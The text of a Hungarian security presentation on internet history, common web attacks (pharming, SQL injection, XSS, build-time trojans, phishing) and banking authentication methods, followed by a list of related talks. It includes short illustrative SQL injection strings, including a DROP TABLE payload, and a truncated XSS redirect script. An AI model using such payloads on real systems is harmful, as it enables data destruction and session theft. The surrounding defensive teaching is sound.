Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft.
|
|
- Gyula Varga
- 8 évvel ezelőtt
- Látták:
Átírás
1 Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft. Cardinal Kft., Gyimesi István
2 Hova fejlődött az Internet az elmúlt 10 évben? Kommunkációs protokollok A web nyelve Biztonsági kockázatok Leggyakoribb támadási módok Védekezési lehetőségek Felvilágosítás fontossága Cardinal Kft., Gyimesi István
3 Egy kis Internet történelem - kommunikáció TCP IPv4 IPv6 HTTP1.1? HTTP1.0 Cardinal Kft., Gyimesi István
4 Egy kis Internet történelem a web nyelve ~ SGML HTML JavaScript HTML4 XHTML? DOM CSS XML Cardinal Kft., Gyimesi István
5 Egy kis Internet történelem a web nyelve 2003 körül: DHTML (Dynamic HTML) XHTML oldalak DOM alapú manipulálása Használt szabványok: HTML CSS JavaScript DOM Cardinal Kft., Gyimesi István
6 Egy kis Internet történelem a web nyelve 2003 körül: DHTML (Dynamic HTML) XHTML oldalak DOM alapú manipulálása Használt szabványok: HTML 1991 CSS 1996 JavaScript 1995 DOM 1998 Cardinal Kft., Gyimesi István
7 Egy kis Internet történelem a web nyelve 2005: AJAX (Asyncronous JavaScript And XML) Desktop alkalmazás-szerűbb web alkalmazások Használt szabványok: HTTP XML CSS JavaScript DOM Cardinal Kft., Gyimesi István
8 Egy kis Internet történelem a web nyelve 2005: AJAX (Asyncronous JavaScript And XML) Desktop alkalmazás-szerűbb web alkalmazások Használt szabványok: HTTP 1996 XML 1998 CSS 1996 JavaScript 1995 DOM 1998 Cardinal Kft., Gyimesi István
9 Lassan 2008-at írunk... Az Internet elavult, akadályozza a fejlődést. A böngészők még mindig különböző mértékben támogatják a szabványokat. e-megoldásokat erőszakolunk bele webservice e-government e-commerce e-business e-banking Cardinal Kft., Gyimesi István
10 Lassan 2008-at írunk... a HTTP csak kérés-válasz alapú kommunikációt biztosít nincs sessionmanagement (a cookie nem jó megoldás!) gyenge a user interface eltérően működő böngészők elégtelen biztonsági eszközök webservice Applet? A Microsoft ellehetetlenítette. Flash? A világ nem tekinti alkalmazásfejlesztő-eszköznek e-government e-commerce e-business e-banking Cardinal Kft., Gyimesi István
11 Nagyobb üzlet, mint a drogkereskedelem forrás: Ellopott adatok kereskedelme (bankszámla: $30-$400, hitelkártya adatok: $5, -jelszavak $1- $300, -címek: $2-$4/MByte) forrás: Távirányított zombihálózatok kiépítése (szervezett támadások, harc a zombihálózatok között) Két kitalált internet banking oldal 8 hét alatt több, mint húszezer támadást kapott forrás: Cardinal Kft., Gyimesi István
12 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
13 Biztonsági rések kihasználása (exploit-ok) Már nem unatkozó egyetemisták írnak vírusokat! Elterjedtek a többrétegű támadások. A cél adatok (pl. -címek) gyűjtése és botnet hálózatok kiépítése! A Storm féreg becslések szerint 2 milliós botnet hálózatot hozott létre. spam-ek küldése (összes levelezés 66%-a spam, és növekszik) DoS támadások szuperszámítógépeket meghaladó számítási kapacitás Cardinal Kft., Gyimesi István
14 És akkor a kínaiak... A céges helyett saját számítógépeik elé ülnek. Képzetlen felhasználók, nem foglalkoznak a biztonsággal. Rengeteg gép fertőződik meg egyszerre. (2007. október 1. és 6. között mintegy egymillió) Jelenleg a lakosság elenyésző hányada internetezik. (Vidéken pl. csak 5%) Félévente 15 millióval több internetező. (XI. ötéves terv: telefon mellé internet is jár) forrás: Cardinal Kft., Gyimesi István
15 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
16 A kliensoldali vizsgálat nem ér semmit! Cardinal Kft., Gyimesi István
17 A kliensoldali vizsgálat nem ér semmit! Cardinal Kft., Gyimesi István
18 A kliensoldali vizsgálat nem ér semmit! Nem szabad az input hosszában, tartalmában megbízni. A combo-ból is tetszőleges adat jöhet. A readonly mezők is változtathatók. <input name= username maxlength= int main(void) { char name[20]; } strcpy(name, getfield( username ); Cardinal Kft., Gyimesi István
19 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
20 Pharming DNS bejegyzéseket támad, az IP cím feloldás gyengeségét használja ki. Vírus segítségével az operációs rendszer hosts file-ját, Local Network Routerek DNS beállításait, WiFi routerek DNS beállításait írja át. Cardinal Kft., Gyimesi István
21 Pharming DNS bejegyzéseket támad, az IP cím feloldás gyengeségét használja ki. Vírus segítségével az operációs rendszer hosts file-ját, Local Network Routerek DNS beállításait, WiFi routerek DNS beállításait írja át. Cardinal Kft., Gyimesi István
22 Pharming A tanúsítványok érvényesek maradnak! Man-in-the-middle jellegű támadásokhoz vezet. Védekezés: vírusvédelem, tűzfalak routerek default jelszavainak módosítása WiFi hálózatok védelme Cardinal Kft., Gyimesi István
23 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
24 SQL injection Az SQL szöveges parancsformátum. Az alkalmazásoknak ilyen parancsokat kell összeállítani. Megfelelő inputtal támadni lehet az alkalmazást. statement := select * from users where name = ' + username + ' ; ha username értéke: a' or 't' = 't select * from users where name = 'a' or 't' = 't' de username lehet akár: a'; DROP TABLE users; -- select * from users where name = 'a'; DROP TABLE users; --'; Cardinal Kft., Gyimesi István
25 SQL injection where megváltoztatása más parancs beszúrása függvényhívás beszúrása adatbáziskezelő hibáinak kiaknázása Cardinal Kft., Gyimesi István
26 SQL injection Az oktatási anyagokban is fel kell hívni a figyelmet erre! Forrás: Programming ASP.NET (O'Reilly) Cardinal Kft., Gyimesi István
27 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
28 XSS: Cross-site scripting a támadó javascript kódot küld el bemenetként ez a kód lefut a böngészőben, amikor ez az input megjelenik a felhasználónál session azonosító ellopása input adatok elküldése egy másik szerverre <input type= text name= comment /> form input: <script>window.location=' echo <P id= comment > echo $username echo </P> Cardinal Kft., Gyimesi István
29 XSS: Cross-site scripting a támadó javascript kódot küld el bemenetként ez a kód lefut a böngészőben, amikor ez az input megjelenik a felhasználónál session azonosító ellopása input adatok elküldése egy másik szerverre eredmény: <P id= comment > <script>window.location=' </P> Cardinal Kft., Gyimesi István
30 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
31 XBI: Cross-build injection trójai kód elhelyezése nyílt forráskódú programokban fejlesztőeszközök on-line töltik le a szükséges komponenseket a trójai így számos szoftverben elterjed pharminggal is lehet kombinálni ftp.openbsd.org <dependency> <get src= ftp.openbsd.org/openssl.jar /> </dependency> Fejlesztőgép: dev@/source>build pharming Például: OpenSSL 3.4p1 trójai (2002., ftp.openssh.com feltörése, a támadó a kódban portot nyitott az internet felé) SendMail trójai (2002., ftp.sendmail.org feltörése) Cardinal Kft., Gyimesi István
32 Védekezés webes alkalmazásokban Input ellenőrzése minden esetben. (hossz, tartalom, escape-elések) Ha kliensoldalon szűrök, nem szűrök semmit. SQL utasításokat ne sztringekből fűzzük össze. (használjunk paramétereket) Minimális jogosultsággal fusson a webes alkalmazás. Csak a legszükségesebb komponensek legyenek beépítve. Kimenő oldal vizsgálata, szűrése. Felhasználók többszintű autentikációja, hitelesítés, többszintű naplózás. Jelszavak kódolt tárolása, belső kommunkáció titkosítása. (A banki támadások 80%-a belüről jön!) Cardinal Kft., Gyimesi István
33 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
34 Phishing adathalász levelek december: BB, ERSTE, CIB, Raiffeisen, Szigetvári Tksz. cél: minél több mail megy ki, arányaiban annál több felhasználó esik áldozatul erre is jók a botnet hálózatok! vége: készpénz küldése küldföldre So long and thanks for all the phish! Cardinal Kft., Gyimesi István
35 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
36 Whaling nagy halakat keresnek meg vele cél: kevés, de jól célzott adatkérő levél elküldése Cardinal Kft., Gyimesi István
37 Támadások fajtái Technológiát támadják: Exploit-ok (biztonsági hibák, rések kihasználása) Input támadása Pharming DoS SQL Injection, XSS, XBI, stb. A felhasználót támadják: Phishing Whaling Social Engineering Cardinal Kft., Gyimesi István
38 Social engineering nem feltétlenül az Interneten keresztül történik emberek hiszékenységének, segítőkészségének kihasználása pl.: nigériai levelek bizonyos szempontból a phishing és a whaling is ide tartozik Cardinal Kft., Gyimesi István
39 Hitelesítési módok A hitelesítéssel valószínűsítjuk (!), hogy a vonal túloldalán az adott személy van. Elterjedt hitelesítési módok: Aláírási jelszó TAN-kód Chipkártya Hitelesítő token SMS jelszó Cardinal Kft., Gyimesi István
40 TAN-kód egyszer használatos kódok jelszavas kiegészítő védelem kell hozzá már öt éve is elavultnak tűnt, de az ügyfelek még mindig használják TAN-kód tábla Felhasználó: Kiss János Cardinal Kft., Gyimesi István
41 Token fizikailag független eszköz kódokat generálnak ha nincs PIN-kód, kiegészítő jelszavas védelem kell Cardinal Kft., Gyimesi István
42 Chipkártya legerősebb biztonság nem terjedt el eléggé olvasót, meghajtót telepíteni kell elveszik a mobilitás Cardinal Kft., Gyimesi István
43 SMS jelszó Magyarország vezető első: Konzumbank (2002.) egyszer használatos, időkorlátos kódok két független csatornát használ, ezeket egyszerre kell támadni Cardinal Kft., Gyimesi István
44 A tudás hatalom! Az emberek nincsenek tisztában az Internet lehetőségeivel, korlátaival, veszélyeivel. A biztonságos internetezésre is meg kell tanítani a felhasználókat. Céges környezetben kiemelten nagy érték az információ, és a biztonság-tudatosság. Otthoni WiFi kapcsolatok védelme. Bluetooth eszközök védelme. Etikus hacker tanfolyamok. És vigyázzunk az ünnepnapokon...! Cardinal Kft., Gyimesi István
Az Internet elavult. Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft. www.cardinal.hu
Az Internet elavult Gyimesi István fejlesztési vezető Cardinal Számítástechnikai Kft wwwcardinalhu Cardinal Kft 2006 1 Elektronikus elérésre szükség van Internet híján betárcsázós ügyfélprogramok voltak:
RészletesebbenWebapp (in)security. Gyakori hibákról és azok kivédéséről fejlesztőknek és üzemeltetőknek egyaránt. Veres-Szentkirályi András
Webapp (in)security Gyakori hibákról és azok kivédéséről fejlesztőknek és üzemeltetőknek egyaránt Veres-Szentkirályi András Rövid áttekintés Webalkalmazások fejlesztése során elkövetett leggyakoribb hibák
RészletesebbenKétcsatornás autentikáció
Kétcsatornás autentikáció Az internet banking rendszerek biztonságának aktuális kérdései Gyimesi István, fejlesztési vezető, Cardinal Kft. Az előző részek tartalmából... E-Banking Summit 2012, Cardinal
RészletesebbenWebes alkalmazások fejlesztése 1. előadás. Webes alkalmazások és biztonságuk
Eötvös Loránd Tudományegyetem Informatikai Kar Webes alkalmazások fejlesztése 1. előadás Webes alkalmazások és biztonságuk 2014.02.10. Giachetta Roberto groberto@inf.elte.hu http://people.inf.elte.hu/groberto
RészletesebbenWeboldalak biztonsága
Weboldalak biztonsága Kertész Gábor kertesz.gabor@arek.uni-obuda.hu Óbudai Egyetem Alba Regia Egyetemi Központ http://arek.uni-obuda.hu/~kerteszg Mi a web? Gyakori tévedés: az internet és a web nem ugyanaz!
RészletesebbenAdatbázisok elleni fenyegetések rendszerezése. Fleiner Rita BMF/NIK Robothadviselés 2009
Adatbázisok elleni fenyegetések rendszerezése Fleiner Rita BMF/NIK Robothadviselés 2009 Előadás tartalma Adatbázis biztonsággal kapcsolatos fogalmak értelmezése Rendszertani alapok Rendszerezési kategóriák
RészletesebbenWebes alkalmazások fejlesztése 1. előadás. Webes alkalmazások és biztonságuk. Cserép Máté
Eötvös Loránd Tudományegyetem Informatikai Kar Webes alkalmazások fejlesztése 1. előadás Webes alkalmazások és biztonságuk Cserép Máté mcserep@inf.elte.hu http://mcserep.web.elte.hu Kommunikáció Alkalmazások
Részletesebben20 éve az informatikában
Ki vagy? Felhasználók azonosítása elektronikus banki rendszerekben Gyimesi István, fejlesztési vezető, Cardinal Kft. Elektronikus bankolás Internet Banking/Mobil Banking/Ügyfélterminál alkalmazások három
RészletesebbenElektronikus levelek. Az informatikai biztonság alapjai II.
Elektronikus levelek Az informatikai biztonság alapjai II. Készítette: Póserné Oláh Valéria poserne.valeria@nik.bmf.hu Miről lesz szó? Elektronikus levelek felépítése egyszerű szövegű levél felépítése
RészletesebbenWeboldalak Biztonsági Kérdései
Weboldalak Biztonsági Kérdései Kliens szerver modellek Kliens szerver modellek Offline világ Online világ és a programokkal szemben támasztott elvárások helyett... Fejlesztés üteme gyors Előregyártott
RészletesebbenIT hálózat biztonság. A hálózati támadások célpontjai
6. A hálózati támadások célpontjai Smart TV Számítógépes technológia (4K, wifi, ) Legtöbbször Android operációs rendszerű Wifi, DirectWifi, Bluetooth kapcsolatra képes Átjáróként használható más hálózati
RészletesebbenBeállítások 1. Töltse be a Planet_NET.pkt állományt a szimulációs programba! A teszthálózat már tartalmazza a vállalat
Planet-NET Egy terjeszkedés alatt álló vállalat hálózatának tervezésével bízták meg. A vállalat jelenleg három telephellyel rendelkezik. Feladata, hogy a megadott tervek alapján szimulációs programmal
RészletesebbenIT hálózat biztonság. Hálózati támadások
5. Hálózati támadások Támadások típusai: Emberek manipulációja (social engineering) Fizikai támadás Hardveres támadás Szoftveres támadás illetve ezek tetszőleges kombinációja 2 A biztonsági tevékenységek
RészletesebbenECDL Információ és kommunikáció
1. rész: Információ 7.1 Az internet 7.1.1 Fogalmak és szakkifejezések 7.1.2 Biztonsági megfontolások 7.1.3 Első lépések a webböngésző használatában 7.1.4 A beállítások elévégzése 7.1.1.1 Az internet és
RészletesebbenINFORMATIKA EGYRE NAGYOBB SZEREPE A KÖNYVELÉSBEN
N 1. Informatikai eszközök az irodában PC, Notebook, Szerver A számítógép típusonként az informatikai feladatoknak megfelelően. Nyomtatók, faxok, scannerek, fénymásolók Írásos dokumentum előállító eszközök.
RészletesebbenSzámítástechnikai kommunikációs lehetőségek a QB-Pharma rendszerrel. Előadó: Bagi Zoltán Quadro Byte Kft. ügyvezető
Számítástechnikai kommunikációs lehetőségek a QB-Pharma rendszerrel. Előadó: Bagi Zoltán Quadro Byte Kft. ügyvezető Az Uniós országokban már alkalmazott új lehetőségek Korszerű zárt hálózatok, rendszerek,
RészletesebbenIntegrált spam, vírus, phishing és hálózati védelem az elektronikus levelezésben. Börtsök András Projekt vezető. www.nospammail.hu
Integrált spam, vírus, phishing és hálózati védelem az elektronikus levelezésben Börtsök András Projekt vezető www.nospammail.hu Email forgalom 2010 2010. májusában Magyarország az egy főre jutó spamek
RészletesebbenWeb service fenyegetések e- közigazgatási. IT biztonsági tanácsadó
Web service fenyegetések e- közigazgatási környezetben Krasznay Csaba IT biztonsági tanácsadó HP Magyarország Kft. Bevezetése etés A Magyar Köztársaság elektronikus közigazgatási rendszere az elmúlt években
RészletesebbenGyors telepítési kézikönyv
netis Vezeték nélküli, N router Gyors telepítési kézikönyv 1. A csomagolás tartalma (Vezeték nélküli,n Router, Hálózati adapter, Ethernet kábel, Kézikönyv) * A kézikönyv, az összes, Netis, 150Mbps/300Mbps
RészletesebbenNetis vezeték nélküli, N típusú, router
Netis vezeték nélküli, N típusú, router Gyors üzembe helyezési kézikönyv Típusok: WF-2409/WF2409/WF2409D A csomagolás tartalma (Vezeték nélküli, N típusú, router, hálózati adapter, ethernet kábel, kézikönyv,
RészletesebbenALKALMAZÁSOK ISMERTETÉSE
SZE INFORMATIKAI KÉPZÉS 1 SZE SPECIFIKUS IT ISMERETEK ALKALMAZÁSOK ISMERTETÉSE A feladat megoldása során valamely Windows Operációs rendszer használata a javasolt. Ebben a feladatban a következőket fogjuk
RészletesebbenSzámítógépes vírusok. Barta Bettina 12. B
Számítógépes vírusok Barta Bettina 12. B Vírusok és jellemzőik Fogalma: A számítógépes vírus olyan önmagát sokszorosító program,mely képes saját magát más végrehajtható alkalmazásokban, vagy dokumentumokban
RészletesebbenInformációbiztonsági kihívások. Horváth Tamás & Dellei László 2010. 11. 23.
Információbiztonsági kihívások Horváth Tamás & Dellei László 2010. 11. 23. Bemutatkozás Miről lesz szó Aktualitások, veszélyek az IT biztonság területén Megoldások Elő bemutató WIFI Hack Nádor Rendszerház
RészletesebbenGyors üzembe helyezési kézikönyv
Netis vezeték nélküli, kétsávos router Gyors üzembe helyezési kézikönyv WF2471/WF2471D A csomagolás tartalma (Két sávos router, hálózati adapter, ethernet kábel, kézikönyv) 1. Csatlakozás 1. Kapcsolja
RészletesebbenCOMET webalkalmazás fejlesztés. Tóth Ádám Jasmin Media Group
COMET webalkalmazás fejlesztés Tóth Ádám Jasmin Media Group Az előadás tartalmából Alapproblémák, fundamentális kérdések Az eseményvezérelt architektúra alapjai HTTP-streaming megoldások AJAX Polling COMET
RészletesebbenSilent Signal Kft. Webáruházak informatikai biztonsága Veres-Szentkirályi András 2011.03.04. 2011.03.04 Marketingtorta - 4 1
Silent Signal Kft. Webáruházak informatikai biztonsága Veres-Szentkirályi András 2011.03.04. 2011.03.04 Marketingtorta - 4 1 Témáink Bevezető Webáruház, mint IT rendszer biztonsága OWASP TOP10 webes hiba
RészletesebbenÉRETTSÉGI TÉTELCÍMEK 2018 Informatika
Budapesti Egyetemi Katolikus Gimnázium és Kollégium ÉRETTSÉGI TÉTELCÍMEK 2018 Informatika Reischlné Rajzó Zsuzsanna Szaktanár Endrédi Józsefné Igazgató Kelt: Budapest, 2018. március 1. tétel A kommunikáció
RészletesebbenSzámítógépes munkakörnyezet II. Szoftver
Számítógépes munkakörnyezet II. Szoftver A hardver és a felhasználó közötti kapcsolat Szoftverek csoportosítása Számítógép működtetéséhez szükséges szoftverek Operációs rendszerek Üzemeltetési segédprogramok
RészletesebbenWeb-fejlesztés NGM_IN002_1
Web-fejlesztés NGM_IN002_1 Rich Internet Applications RIA Vékony-kliens generált (statikus) HTML megjelenítése szerver oldali feldolgozással szinkron oldal megjelenítéssel RIA desktop alkalmazások funkcionalitása
RészletesebbenHÁLÓZATI BEÁLLÍTÁS. Videorögzítőkhöz
I BEÁLLÍTÁS Videorögzítőkhöz Kérjük olvassa át figyelmesen ezt az útmutatót a készülék használata előtt és tartsa meg jövőben felhasználás céljára. Fenntartjuk a jogot a kézikönyv tartalmának bármikor
RészletesebbenHálózati alapismeretek
Hálózati alapismeretek 1. Mi a hálózat? Az egymással összekapcsolt számítógépeket számítógép-hálózatnak nevezzük. (minimum 2 db gép) 2. A hálózatok feladatai: a. Lehetővé tenni az adatok és programok közös
RészletesebbenBevezető. Az informatikai biztonság alapjai II.
Bevezető Az informatikai biztonság alapjai II. Póserné Oláh Valéria poserne.valeria@nik.uni-obuda.hu http://nik.uni-obuda.hu/poserne/iba Miről is lesz szó a félév során? Vírusvédelem Biztonságos levelezés
RészletesebbenNGFW + IPS + anti-apt + BYOD = Sophos UTM 9.2
NGFW + IPS + anti-apt + BYOD = Sophos UTM 9.2 Balogh Viktor TMSI Kft. viktor.balogh@tmsi.hu CISM, Sophos UTM Architect, FireEye Certified Engineer antidotum 2014 Sophos UTM 9.1 tulajdonságai röviden NGFW
RészletesebbenPTA CERT-Hungary Nemzeti Hálózatbiztonsági Központ
Puskás Tivadar Közalapítvány PTA CERT-Hungary Nemzeti Hálózatbiztonsági Központ Adathalászat (phishing) 2012. május Tartalom Bevezető...3 Adathalászat (phishing)...3 Banki és pénzügyi szektor ellen irányuló
RészletesebbenInformatikai biztonság a kezdetektől napjainkig
Informatikai biztonság a kezdetektől napjainkig Dr. Leitold Ferenc tanszékvezető, egyetemi docens Nemzeti Közszolgálati Egyetem Közigazgatás-tudományi Kar E-közszolgálati Fejlesztési Intézet Információbiztonsági
RészletesebbenAdott egy szervezet, és annak ügyfelei. Nevezzük a szervezetet bank -nak. Az ügyfelek az Interneten keresztül érzékeny információkat, utasításokat
! # $%&'() Adott egy szervezet, és annak ügyfelei. Nevezzük a szervezetet bank -nak. Az ügyfelek az Interneten keresztül érzékeny információkat, utasításokat küldenek a banknak. A bank valahogy meggyzdik
RészletesebbenValimed API. REST API a magyarországi orvos pecsétszámok validálására
Valimed API REST API a magyarországi orvos pecsétszámok validálására 1. A Valimedről és a jogi háttérről A Valimed legfőképpen gyógyszergyártóknak és orvosi témában érdekelt online szolgáltatóknak szóló
RészletesebbenTestnevelési Egyetem VPN beállítása és használata
Testnevelési Egyetem VPN beállítása és használata Tartalom 1. Figyelmeztetés!... 2 2. Hogyan működik a VPN?... 2 3. Beállítás... 3 3.1 Tudnivalók a beállítás előtt... 3 4. Használat... 7 5. Igénylés...
RészletesebbenWebkezdő. A modul célja
Webkezdő A modul célja Az ECDL Webkezdő modulvizsga követelménye (Syllabus 1.5), hogy a jelölt tisztában legyen a Webszerkesztés fogalmával, és képes legyen egy weboldalt létrehozni. A jelöltnek értenie
RészletesebbenE mail titkosítás az üzleti életben ma már követelmény! Ön szerint ki tudja elolvasni bizalmas email leveleinket?
E mail titkosítás az üzleti életben ma már követelmény! Ön szerint ki tudja elolvasni bizalmas email leveleinket? Egy email szövegében elhelyezet információ annyira biztonságos, mintha ugyanazt az információt
RészletesebbenSzámítógépes alapismeretek 2.
Számítógépes alapismeretek 2. 1/7 Kitöltő adatai: Név: Osztály: E-mail cím: 2/7 Kérdések: Mire szolgál az asztal? Az ideiglenesen törölt fájlok tárolására. A telepített alkalmazások tárolására. A telepített
RészletesebbenFogalomtár Etikus hackelés tárgyban Azonosító: S2_Fogalomtar_v1 Silent Signal Kft. Email: info@silentsignal.hu Web: www.silentsignal.
Fogalomtár Etikus hackelés tárgyban Azonosító: S2_Fogalomtar_v1 Silent Signal Kft. Email: info@silentsignal.hu Web: www.silentsignal.hu. 1 Tartalom 1. BEVEZETŐ... 3 1.1 Architektúra (terv) felülvizsgálat...
Részletesebben8. Hálózatbiztonsági alapok. CCNA Discovery 1 8. fejezet Hálózatbiztonsági alapok
8. Hálózatbiztonsági alapok Tartalom 8.1 A hálózati kommunikáció veszélyei 8.2 Támadási módszerek 8.3 Biztonságpolitika 8.4 Tűzfalak használata A hálózati kommunikáció veszélyei 8.1 A hálózatba való behatolás
RészletesebbenMoodle -egy ingyenes, sokoldalú LMS rendszer használata a felsőoktatásban
Moodle -egy ingyenes, sokoldalú LMS rendszer használata a felsőoktatásban Vágvölgyi Csaba (vagvolgy@kfrtkf.hu) Kölcsey Ferenc Református Tanítóképző Főiskola Debrecen Moodle??? Mi is ez egyáltalán? Moodle
RészletesebbenAlapfogalmak. Biztonság. Biztonsági támadások Biztonsági célok
Alapfogalmak Biztonság Biztonsági támadások Biztonsági célok Biztonsági szolgáltatások Védelmi módszerek Hálózati fenyegetettség Biztonságos kommunikáció Kriptográfia SSL/TSL IPSec Támadási folyamatok
RészletesebbenAdatbiztonság és adatvédelem
Adatbiztonság és adatvédelem Avagy, hogyan védhetjük meg adatainkat? Az adat szó fogalma Számítástechnikában számokkal Adatgyőjtés Adatbevitel Adatfeldolgozás Adattárolás Rövidtávon Hosszútávon Önmagában
Részletesebbene-szignó Online e-kézbesítés Végrehajtási Rendszerekhez
MICROSEC Számítástechnikai Fejlesztő zrt. e-szignó Online e-kézbesítés Végrehajtási Rendszerekhez Felhasználói útmutató https://online.e-szigno.hu/ 1 Tartalom 1. Bevezetés... 3 2. A rendszer használatának
RészletesebbenBérprogram vásárlásakor az Ügyfélnek e-mailben és levélben is megküldjük a termék letöltéséhez és aktiválásához szükséges termékszámot.
Telepítés Bérprogram vásárlásakor az Ügyfélnek e-mailben és levélben is megküldjük a termék letöltéséhez és aktiválásához szükséges termékszámot. A programot honlapunkról, az alábbi linkről tudják letölteni:
RészletesebbenVIII. Mérés SZÉCHENYI ISTVÁN EGYETEM GYŐR TÁVKÖZLÉSI TANSZÉK
Mérési utasítás IPv6 A Távközlés-informatika laborban natív IPv6 rendszer áll rendelkezésre. Először az ún. állapotmentes automatikus címhozzárendelést (SLAAC, stateless address autoconfiguration) vizsgáljuk
RészletesebbenS, mint secure. Nagy Attila Gábor Wildom Kft. nagya@wildom.com
S, mint secure Wildom Kft. nagya@wildom.com Egy fejlesztő, sok hozzáférés Web alkalmazások esetében a fejlesztést és a telepítést általában ugyanaz a személy végzi Több rendszerhez és géphez rendelkezik
RészletesebbenInformáció és kommunikáció
Információ és kommunikáció Tanmenet Információ és kommunikáció TANMENET- Információ és kommunikáció Témakörök Javasolt óraszám 1. Hálózati alapismeretek 20 perc 2. Az internet jellemzői 25 perc 3. Szolgáltatások
RészletesebbenAPI tervezése mobil környezetbe. gyakorlat
API tervezése mobil környezetbe gyakorlat Feladat Szenzoradatokat gyűjtő rendszer Mobil klienssel Webes adminisztrációs felület API felhasználói Szenzor node Egyirányú adatküldés Kis számítási kapacitás
RészletesebbenIP alapú távközlés. Virtuális magánhálózatok (VPN)
IP alapú távközlés Virtuális magánhálózatok (VPN) Jellemzők Virtual Private Network VPN Publikus hálózatokon is használható Több telephelyes cégek hálózatai biztonságosan összeköthetők Olcsóbb megoldás,
RészletesebbenHálózati projektor használati útmutató
Hálózati projektor használati útmutató Tartalomjegyzék Előkészületek...3 Projektor csatlakoztatása a számítógéphez...3 Vezetékes kapcsolat... 3 A projektor távvezérlése LAN-on keresztül...5 Támogatott
RészletesebbenKezdő lépések Microsoft Outlook
Kezdő lépések Microsoft Outlook A Central Europe On-Demand Zrt. által, a Telenor Magyarország Zrt. részére nyújtott szolgáltatások rövid kezelési útmutatója 1 Tartalom Áttekintés... 3 MAPI mailbox konfiguráció
Részletesebben15. Tétel. Extran et olyan biztonsá gos, privát, intranet hálózat amely internet protokol lok segítség ével teszi lehetővé a
15. Tétel Cégénél belső intranet kiépítését tervezik. Feladata, hogy ismertesse a döntéshozók számára a különböző megvalósítható szolgáltatásokat, azok előnyeit és hátrányait elemezve. Térjen ki a http,
Részletesebben1/9. Sunell IP kamerák webes felületének használati útmutatója. Élő kép (Live Video)
felületének használati útmutatója Élő kép (Live Video) Belépés után rögtön látható a kamera élő képe, váltható a stream minősége (a beállításoktól függően), valamint a képre jobb kattintással előhozható
RészletesebbenA WINETTOU Távközlési Szolgáltató Korlátolt Felelısségő Társaság. Internet szolgáltatásra vonatkozó Általános Szerzıdéses Feltételek
A WINETTOU Távközlési Szolgáltató Korlátolt Felelısségő Társaság Internet szolgáltatásra vonatkozó Általános Szerzıdéses Feltételek IV. számú módosításának kivonata 2010. március 15. Általános szerzıdési
RészletesebbenFELHASZNÁLÓI KÉZIKÖNYV. WF-2322 Vezetéknélküli Hozzéférési Pont
FELHASZNÁLÓI KÉZIKÖNYV WF-2322 Vezetéknélküli Hozzéférési Pont Netis Vezetéknélküli Hozzáférési Pont Felhasználói Kézikönyv Netis Vezetéknélküli Hozzáférési Pont Felhasználói Kézikönyv 1. A csomag tartalma
RészletesebbenWWW Kliens-szerver Alapfogalmak Technológiák Terv. Web programozás 1 / 31
Web programozás 2011 2012 1 / 31 Áttekintés Mi a web? / A web rövid története Kliens szerver architektúra Néhány alapfogalom Kliens- illetve szerver oldali technológiák áttekintése Miről lesz szó... (kurzus/labor/vizsga)
RészletesebbenIngyenes DDNS beállítása MAZi DVR/NVR/IP eszközökön
Ingyenes DDNS beállítása MAZi DVR/NVR/IP eszközökön Fontos Amennyiben egy eszköz interneten keresztüli elérését lehetővé teszi, az illetéktelen hozzáférés megakadályozása érdekében: előtte az alapértelmezett
RészletesebbenCOOKIE KEZELÉSI TÁJÉKOZTATÓ. A HTTP-cookie (köznyelvben csak cookie, vagy süti) egy olyan fájl, (egy adatsor)
COOKIE KEZELÉSI TÁJÉKOZTATÓ Általános információ A HTTP-cookie (köznyelvben csak cookie, vagy süti) egy olyan fájl, (egy adatsor) amit - a weboldal látogatójának számítógépén, mobiltelefonján vagy egyéb,
RészletesebbenHálózati betekint ő program telepítése mobil telefonra. Symbian. alarm shop. Windows mobile Android IPhone Blackberry
Glover Electric kft. www.visiotech.hu Hálózati betekint ő program telepítése mobil telefonra. Symbian Windows mobile Android IPhone Blackberry 1.Symbian Operációs Rendszer 1. Először telepítenie kell a
RészletesebbenA Nemzeti Elektronikus Információbiztonsági Hatóság
A Nemzeti Elektronikus Információbiztonsági Hatóság A Nemzeti Elektronikus Információbiztonsági Hatóság (NEIH) A 2013. évi L. törvény hatálya alá tartozó elektronikus információs rendszerek biztonságának
RészletesebbenGLOBÁLIS KIHÍVÁS, REGIONÁLIS VÁLASZOK
GLOBÁLIS KIHÍVÁS, REGIONÁLIS VÁLASZOK KIBERBIZTONSÁG KELET-KÖZÉP-EURÓPÁBAN Berzsenyi Dániel külső munkatárs Stratégiai Védelmi Kutatóközpont Copyright 2012 The Nielsen Company. Confidential and proprietary.
RészletesebbenAdatbiztonság PPZH 2011. május 20.
